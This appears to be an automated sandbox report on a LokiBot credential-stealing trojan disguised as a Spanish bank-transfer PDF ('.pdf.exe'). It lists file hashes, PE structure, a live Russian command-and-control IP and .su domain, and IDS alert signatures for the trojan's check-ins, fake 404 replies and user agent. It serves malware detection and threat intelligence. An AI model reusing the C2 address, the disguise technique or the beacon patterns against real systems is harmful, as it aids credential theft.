                                  http://www.galapagosdesign.com/DPleasetransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers8transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.fonts.comtransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.sandoll.co.krtransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.urwpp.deDPleasetransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.zhongyicts.com.cntransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.sakkal.comtransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      91.142.77.45
                                      sempersim.suRussian Federation
                                      48720VTSL1-ASRUtrue
                                      Joe Sandbox Version:36.0.0 Rainbow Opal
                                      Analysis ID:736955
                                      Start date and time:2022-11-03 12:28:50 +01:00
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 7m 37s
                                      Hypervisor based Inspection enabled:false
                                      Report type:light
                                      Sample file name:transferencia bancaria.pdf.exe
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Number of analysed new started processes analysed:13
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@3/3@40/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HDC Information:Failed
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 0
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                      • HTTP Packets have been reduced
                                      • TCP Packets have been reduced to 100
                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      TimeTypeDescription
                                      12:29:57API Interceptor38x Sleep call for process: transferencia bancaria.pdf.exe modified
                                      No context
                                      No context
                                      No context
                                      No context
                                      No context
                                      Process:C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1216
                                      Entropy (8bit):5.355304211458859
                                      Encrypted:false
                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                      MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                      SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                      SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                      SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                      Malicious:true
                                      Reputation:high, very likely benign file
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                      Process:C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:1
                                      Process:C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):49
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3::
                                      MD5:884BB48A55DA67B4812805CB8905277D
                                      SHA1:6B3D33E00F5B9DEAE2826F80644CB4F6E78B7401
                                      SHA-256:78877FA898F0B4C45C9C33AE941E40617AD7C8657A307DB62BC5691F92F4F60E
                                      SHA-512:989A38778FC961EB2C79E70621EABFB4B22D6537F08A71359B27AF495646E304EE252A523769F66B75BC2FAF546ACB22A71B358B51221174AC0D964DA7A62821
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:.................................................
                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):6.908301217464369
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      • DOS Executable Generic (2002/1) 0.01%
                                      File name:transferencia bancaria.pdf.exe
                                      File size:811008
                                      MD5:355efb2e1f7dd361f8e7cda449a45eac
                                      SHA1:864f8d367c72d37347e2dc8fa799cc9a2550d66c
                                      SHA256:cb90ea9b90ccb675d555891bcbfb224edf1bbfe7a650e9600508c93660ec09eb
                                      SHA512:696a0d695e86094c35abf41001c607fa3df61bbf5cb7bf11feadd4bd434a67ce31628106c71688e8782f4e326e71aaced83b031764c4214832df455329edc8c5
                                      SSDEEP:12288:dR/AN9w7DTIJ0ycSou3KRdwHDI3tRG/8wSRDfs2sFLTAehm8buS89W:3XXEyycSDAwHNi8TAqbD
                                      TLSH:8005E00F8AE6460ED66936B865F0EFB75799DC01F44BC35B17CA6E4BB8432308211BD9
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....|#...............0..X...........v... ........@.. ....................................@................................
                                      Icon Hash:00828e8e8686b000
                                      Entrypoint:0x4c761e
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0xA9237CA5 [Wed Dec 3 11:06:13 2059 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xc75cc0x4f.text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x370.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xca0000xc.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xc75b00x1c.text
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x20000xc56240xc5800False0.712665644778481data6.915983824184794IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rsrc0xc80000x3700x400False0.365234375data2.7841237517285475IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0xca0000xc0x200False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountry
                                      RT_VERSION0xc80580x314data
                                      DLLImport
                                      mscoree.dll_CorExeMain
                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                      192.168.2.691.142.77.4549712802024318 11/03/22-12:30:22.162497TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971280192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549727802024313 11/03/22-12:31:01.987085TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972780192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549723802825766 11/03/22-12:30:53.367985TCP2825766ETPRO TROJAN LokiBot Checkin M24972380192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549724802021641 11/03/22-12:30:54.913991TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972480192.168.2.691.142.77.45
                                      192.168.2.68.8.8.859881532014169 11/03/22-12:31:01.170102UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5988153192.168.2.68.8.8.8
                                      192.168.2.68.8.8.856122532014169 11/03/22-12:30:45.704907UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5612253192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549741802825766 11/03/22-12:31:39.946873TCP2825766ETPRO TROJAN LokiBot Checkin M24974180192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549745802024313 11/03/22-12:31:50.569101TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974580192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549728802025381 11/03/22-12:31:03.903902TCP2025381ET TROJAN LokiBot Checkin4972880192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549739802021641 11/03/22-12:31:35.606377TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973980192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549738802825766 11/03/22-12:31:33.019427TCP2825766ETPRO TROJAN LokiBot Checkin M24973880192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549713802025381 11/03/22-12:30:25.414440TCP2025381ET TROJAN LokiBot Checkin4971380192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549731802025381 11/03/22-12:31:09.511791TCP2025381ET TROJAN LokiBot Checkin4973180192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549737802024318 11/03/22-12:31:31.046497TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973780192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549713802825766 11/03/22-12:30:25.414440TCP2825766ETPRO TROJAN LokiBot Checkin M24971380192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497182025483 11/03/22-12:30:41.067853TCP2025483ET TROJAN LokiBot Fake 404 Response804971891.142.77.45192.168.2.6
                                      91.142.77.45192.168.2.680497092025483 11/03/22-12:30:17.656419TCP2025483ET TROJAN LokiBot Fake 404 Response804970991.142.77.45192.168.2.6
                                      192.168.2.68.8.8.850343532014169 11/03/22-12:31:05.602892UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5034353192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549717802024318 11/03/22-12:30:35.019960TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971780192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549717802024313 11/03/22-12:30:35.019960TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971780192.168.2.691.142.77.45
                                      192.168.2.68.8.8.856569532014169 11/03/22-12:31:22.519121UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5656953192.168.2.68.8.8.8
                                      91.142.77.45192.168.2.680497122025483 11/03/22-12:30:23.556931TCP2025483ET TROJAN LokiBot Fake 404 Response804971291.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549729802021641 11/03/22-12:31:05.707382TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972980192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549742802021641 11/03/22-12:31:41.893270TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974280192.168.2.691.142.77.45
                                      192.168.2.68.8.8.853943532014169 11/03/22-12:30:54.819244UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5394353192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549730802024318 11/03/22-12:31:07.626823TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973080192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497102025483 11/03/22-12:30:19.791139TCP2025483ET TROJAN LokiBot Fake 404 Response804971091.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549735802024313 11/03/22-12:31:27.516452TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973580192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549721802025381 11/03/22-12:30:48.032802TCP2025381ET TROJAN LokiBot Checkin4972180192.168.2.691.142.77.45
                                      192.168.2.68.8.8.855629532014169 11/03/22-12:31:09.419344UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5562953192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549731802825766 11/03/22-12:31:09.511791TCP2825766ETPRO TROJAN LokiBot Checkin M24973180192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549738802025381 11/03/22-12:31:33.019427TCP2025381ET TROJAN LokiBot Checkin4973880192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549712802024313 11/03/22-12:30:22.162497TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971280192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497142025483 11/03/22-12:30:29.899760TCP2025483ET TROJAN LokiBot Fake 404 Response804971491.142.77.45192.168.2.6
                                      91.142.77.45192.168.2.680497162025483 11/03/22-12:30:34.572782TCP2025483ET TROJAN LokiBot Fake 404 Response804971691.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549706802021641 11/03/22-12:30:09.785093TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970680192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549730802024313 11/03/22-12:31:07.626823TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973080192.168.2.691.142.77.45
                                      192.168.2.68.8.8.861609532014169 11/03/22-12:30:50.734926UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6160953192.168.2.68.8.8.8
                                      192.168.2.68.8.8.862958532014169 11/03/22-12:31:41.802948UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6295853192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549735802024318 11/03/22-12:31:27.516452TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973580192.168.2.691.142.77.45
                                      192.168.2.68.8.8.849232532014169 11/03/22-12:31:30.955921UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related4923253192.168.2.68.8.8.8
                                      192.168.2.68.8.8.862848532014169 11/03/22-12:31:45.492508UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6284853192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549733802025381 11/03/22-12:31:22.614964TCP2025381ET TROJAN LokiBot Checkin4973380192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549732802021641 11/03/22-12:31:20.467945TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973280192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549720802024318 11/03/22-12:30:45.793165TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972080192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549718802025381 11/03/22-12:30:37.003049TCP2025381ET TROJAN LokiBot Checkin4971880192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549721802825766 11/03/22-12:30:48.032802TCP2825766ETPRO TROJAN LokiBot Checkin M24972180192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549720802024313 11/03/22-12:30:45.793165TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972080192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549714802024318 11/03/22-12:30:27.432237TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971480192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549719802024318 11/03/22-12:30:42.564459TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971980192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549725802024313 11/03/22-12:30:57.918358TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972580192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549715802825766 11/03/22-12:30:31.132672TCP2825766ETPRO TROJAN LokiBot Checkin M24971580192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549719802024313 11/03/22-12:30:42.564459TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971980192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549710802825766 11/03/22-12:30:18.297577TCP2825766ETPRO TROJAN LokiBot Checkin M24971080192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549734802021641 11/03/22-12:31:25.377976TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973480192.168.2.691.142.77.45
                                      192.168.2.68.8.8.862910532014169 11/03/22-12:30:27.345778UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6291053192.168.2.68.8.8.8
                                      91.142.77.45192.168.2.680497352025483 11/03/22-12:31:28.883670TCP2025483ET TROJAN LokiBot Fake 404 Response804973591.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549737802021641 11/03/22-12:31:31.046497TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973780192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497422025483 11/03/22-12:31:43.475626TCP2025483ET TROJAN LokiBot Fake 404 Response804974291.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549714802024313 11/03/22-12:30:27.432237TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971480192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549711802025381 11/03/22-12:30:20.264286TCP2025381ET TROJAN LokiBot Checkin4971180192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549722802024313 11/03/22-12:30:50.822444TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972280192.168.2.691.142.77.45
                                      192.168.2.68.8.8.856331532014169 11/03/22-12:30:13.938466UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5633153192.168.2.68.8.8.8
                                      192.168.2.68.8.8.849448532014169 11/03/22-12:30:17.960732UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related4944853192.168.2.68.8.8.8
                                      192.168.2.68.8.8.850506532014169 11/03/22-12:30:15.990659UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5050653192.168.2.68.8.8.8
                                      192.168.2.68.8.8.859752532014169 11/03/22-12:31:35.521025UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5975253192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549722802024318 11/03/22-12:30:50.822444TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972280192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549726802021641 11/03/22-12:30:59.657451TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972680192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549741802025381 11/03/22-12:31:39.946873TCP2025381ET TROJAN LokiBot Checkin4974180192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497392025483 11/03/22-12:31:37.318947TCP2025483ET TROJAN LokiBot Fake 404 Response804973991.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549709802021641 11/03/22-12:30:16.075566TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970980192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549727802024318 11/03/22-12:31:01.987085TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972780192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549728802825766 11/03/22-12:31:03.903902TCP2825766ETPRO TROJAN LokiBot Checkin M24972880192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497312025483 11/03/22-12:31:10.691873TCP2025483ET TROJAN LokiBot Fake 404 Response804973191.142.77.45192.168.2.6
                                      192.168.2.68.8.8.865198532014169 11/03/22-12:30:25.312645UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6519853192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549721802021641 11/03/22-12:30:48.032802TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972180192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549715802024318 11/03/22-12:30:31.132672TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971580192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549726802825766 11/03/22-12:30:59.657451TCP2825766ETPRO TROJAN LokiBot Checkin M24972680192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549724802024313 11/03/22-12:30:54.913991TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972480192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549710802025381 11/03/22-12:30:18.297577TCP2025381ET TROJAN LokiBot Checkin4971080192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549712802021641 11/03/22-12:30:22.162497TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971280192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549735802825766 11/03/22-12:31:27.516452TCP2825766ETPRO TROJAN LokiBot Checkin M24973580192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549744802825766 11/03/22-12:31:45.577786TCP2825766ETPRO TROJAN LokiBot Checkin M24974480192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549740802021641 11/03/22-12:31:37.627027TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974080192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549743802024318 11/03/22-12:31:43.782645TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974380192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549743802024313 11/03/22-12:31:43.782645TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974380192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549707802025381 11/03/22-12:30:11.977904TCP2025381ET TROJAN LokiBot Checkin4970780192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549726802025381 11/03/22-12:30:59.657451TCP2025381ET TROJAN LokiBot Checkin4972680192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549725802024318 11/03/22-12:30:57.918358TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972580192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549707802825766 11/03/22-12:30:11.977904TCP2825766ETPRO TROJAN LokiBot Checkin M24970780192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497342025483 11/03/22-12:31:27.178865TCP2025483ET TROJAN LokiBot Fake 404 Response804973491.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549731802021641 11/03/22-12:31:09.511791TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973180192.168.2.691.142.77.45
                                      192.168.2.68.8.8.852481532014169 11/03/22-12:30:53.275834UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5248153192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549720802025381 11/03/22-12:30:45.793165TCP2025381ET TROJAN LokiBot Checkin4972080192.168.2.691.142.77.45
                                      192.168.2.68.8.8.864404532014169 11/03/22-12:31:43.694917UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6440453192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549708802025381 11/03/22-12:30:14.035064TCP2025381ET TROJAN LokiBot Checkin4970880192.168.2.691.142.77.45
